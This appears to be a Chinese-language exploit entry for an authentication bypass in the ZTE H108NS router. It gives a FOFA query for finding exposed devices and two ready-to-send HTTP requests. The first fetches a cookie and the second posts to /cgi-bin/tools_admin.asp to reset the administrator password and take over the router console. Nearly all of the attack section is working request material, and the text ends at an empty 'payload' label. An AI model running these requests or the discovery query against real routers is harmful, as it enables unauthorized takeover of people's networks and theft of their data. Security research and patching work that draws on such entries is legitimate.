Z9-1中兴-H108NS 路由器-PermissionAC

漏洞描述：

中兴H108NS路由器tools_admin.asp接口处存在身份认证绕过漏洞，攻击者可利用该漏洞绕过身份认证允许访问路由器的管理面板修改管理员密码，获取用户的敏感信息。

网络测绘:

fofa语法：

banner=“Basic realm="H108NS"” || header=“Basic realm="H108NS"”

漏洞复现:

获取cookie

GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

携带cookie修改管理员密码

POST /cgi-bin/tools_admin.asp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Cookie: 获取的cookie
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

adminFlag=1&CurrentAccess=0&uiViewTools_Password=密码&uiViewTools_PasswordConfirm=确认密码

使用admin和修改后密码登录，就可以进入控制台

payload：